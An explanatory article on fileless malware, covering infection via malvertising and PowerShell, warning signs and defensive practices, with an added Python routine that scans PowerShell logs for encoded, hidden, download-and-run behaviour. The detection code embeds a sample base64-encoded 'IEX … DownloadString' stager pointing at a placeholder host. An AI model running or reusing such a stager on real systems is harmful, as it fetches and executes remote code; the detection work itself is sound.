Fileless malware is a popular means for cyber criminals to infiltrate systems unnoticed. Also known as non-malware, zero-footprint, or macro-attack, it differs from traditional malware in that it does not need to install malicious software to infect a victim's computer.
Instead, it exploits vulnerabilities already present on the device: the malware resides in the computer's RAM and abuses legitimate system tools to inject malicious code into normally safe, trustworthy processes, for example javaw.exe or iexplore.exe.
Attack techniques and how fileless malware works
There are many techniques that cyber criminals can use to launch a fileless malware attack. One example is malicious banner advertising, so-called "malvertising". If users click on the ad, they are redirected to a malicious website that appears legitimate and loads Flash, which has known vulnerabilities. Flash then uses the Windows PowerShell tool to execute commands via the command line while it is running in RAM. PowerShell downloads malicious code from a botnet or other compromised server and executes it, whereupon the code searches for data to send to the attacker.
Since fileless malware does not require a file download, it is quite difficult to detect, block, and remove. It has no identifiable code or signature that would allow traditional antivirus programs to detect it. It also has no specific behavior, so heuristic scanners cannot detect it either. Since the malware exploits weaknesses in approved applications that are already on the system, it can also undermine protection through application whitelisting - a process that ensures that only approved applications are installed on a computer.
Restarting the computer can, however, end a fileless malware infection, because RAM only retains its contents while the computer is powered on; once it shuts down, the infection is no longer active. Attackers can nevertheless use the compromise to steal data from the computer or to install other forms of malware that make the foothold persistent. For example, an attacker can set up scripts that run when the system restarts to continue the attack.
Signs of fileless malware
While no new files are installed and there is no typical tell-tale behavior that would make a fileless malware attack obvious, there are some warning signs to look out for. One is unusual network activity and traces, such as the computer connecting to botnet servers. Also watch for signs of compromise in system memory, as well as other artifacts that malicious code may have left behind.
Best practices for protecting against fileless malware
Here are some steps businesses can take to prevent fileless malware infection or to limit the damage in the event of infection:
- No unnecessary functions and applications: Services and program functions that are not used should be deactivated. Companies should also uninstall applications that are not used or that are not necessary for work.
- Sparing assignment of privileges: Companies should restrict administrative privileges and grant users only the permissions they need to do their jobs.
- Regular software updates: All software should be kept up to date and patched regularly.
- Network traffic monitoring: Network traffic should be monitored and the activity logs checked for abnormalities.
- Endpoint protection: Organizations should ensure they have endpoint protection in place and secure every endpoint, including remote and mobile devices, to protect their network.
- PowerShell: Best practices for using and securing PowerShell should also be followed.
- Password hygiene: Passwords should be changed after a fileless malware infection becomes known and after successful cleaning.
- Employee training: In-depth security training for end users can also go a long way in preventing fileless malware infections.
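As an added example that is not part of the original article, the following Python routine triages PowerShell Script Block Logging entries (Event ID 4104, the log that the PowerShell hardening recommended above produces) for the hidden, encoded, download-and-run-in-memory behaviour described earlier. The sample events, the indicator names and the placeholder URL are constructed for illustration, not real captures or real signatures.

```python
import base64
import re
from typing import Optional

# Constructed sample Script Block Logging entries (text of PowerShell Event ID
# 4104), not real captures. Entry 2 hides its command behind -EncodedCommand.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s')"
SAMPLE_EVENTS = [
    {"id": 1, "script": "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime"},
    {"id": 2, "script": "powershell.exe -NoP -W Hidden -EncodedCommand "
                        + base64.b64encode(_STAGER.encode("utf-16le")).decode()},
    {"id": 3, "script": "Import-Module ActiveDirectory; Get-ADUser -Filter *"},
]

# Indicator names are our own labels; the patterns describe the behaviour the
# article warns about: hidden, encoded, download-and-run entirely in RAM.
INDICATORS = {
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_fetch": re.compile(r"downloadstring|downloaddata|invoke-webrequest", re.I),
}
_ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(block: str) -> Optional[str]:
    """Recover the UTF-16LE command hidden in an -EncodedCommand argument, if any."""
    m = _ENCODED_ARG.search(block)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not base64/UTF-16: the raw text is still pattern-matched

def analyze_script_block(block: str) -> dict:
    """Match indicators against the raw block plus its decoded payload."""
    decoded = decode_encoded_command(block)
    text = block if decoded is None else block + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"decoded": decoded, "indicators": hits, "score": len(hits)}

def triage(events, threshold: int = 2):
    """Return (id, indicators) for events matching at least `threshold` indicators."""
    flagged = []
    for ev in events:
        result = analyze_script_block(ev["script"])
        if result["score"] >= threshold:
            flagged.append((ev["id"], result["indicators"]))
    return flagged
```

Decoding the encoded argument before matching is what makes the check useful: the raw 4104 text of entry 2 shows none of the download or execution keywords until the base64 is unwrapped.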
Fileless malware is readily available to criminals because it is often already included in exploit kits. In addition, some hackers offer fileless malware attacks as a service. The malware relies on stealth rather than persistence, although its ability to be combined with other malware lets it achieve both. Companies should therefore implement a security strategy with a layered approach of best practices, security solutions and employee training in order to combat these threats effectively.